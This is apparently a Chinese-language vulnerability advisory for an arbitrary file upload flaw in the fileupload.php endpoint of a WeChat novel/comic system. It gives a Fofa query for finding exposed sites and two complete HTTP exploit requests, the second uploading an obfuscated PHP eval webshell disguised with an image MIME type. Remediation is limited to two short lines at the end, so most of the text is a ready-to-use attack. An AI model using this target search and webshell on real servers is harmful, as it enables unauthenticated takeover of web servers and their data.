0x01 漏洞描述:
在微信公众号小说漫画系统的 fileupload.php
接口中,存在任意文件上传漏洞,该漏洞允许未经身份验证的攻击者上传恶意文件,从而实现代码执行。这种安全隐患使得攻击者能够在服务器上写入后门程序,获取服务器权限,并最终控制整个 Web 服务器。攻击者可能借助重命名文件、伪造 MIME 类型等手段绕过文件类型限制,构造包含恶意代码的文件进行上传。一旦上传成功,攻击者便可通过访问该文件的 URL 执行其中的代码,造成严重的安全威胁。
0x02 搜索语句:
Fofa:"/Public/home/mhjs/jquery.js"
0x03 漏洞复现:
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
Host: your-ip
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
上传成功后访问接口 访问文件路径进行访问
https://your-ip/Public/webuploader/0.1.5/server/upload/1.php
webshell上传
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
Host: your-ip
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: image/jpeg
<?php class G643t6Jo { public function __construct($HPyRR){ @eval("/*Z20S9180P1*/".$HPyRR."/*Z20S9180P1*/"); }}new G643t6Jo($_REQUEST['cmd']);?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
建立连接
0x04 修复建议:
限制上传文件后缀
关闭互联网暴露面或接口设置访问权限